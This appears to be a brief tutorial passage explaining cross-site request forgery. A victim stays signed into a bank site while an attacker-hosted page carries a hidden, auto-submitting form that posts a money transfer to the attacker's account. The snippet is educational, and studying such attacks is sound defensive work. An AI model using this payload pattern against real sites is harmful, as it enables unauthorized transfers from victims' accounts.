Visit this seemingly-innocent page on a different tab. Note the victim is still signed into QuickBank in the other tab โ the browser will send their auth cookie with any request.
Hidden form on attacker.evil:
<form action="https://quickbank.com/transfer" method="POST">
<input name="to" value="attacker_account">
<input name="amount" value="9999">
</form>
<script>form.submit();</script>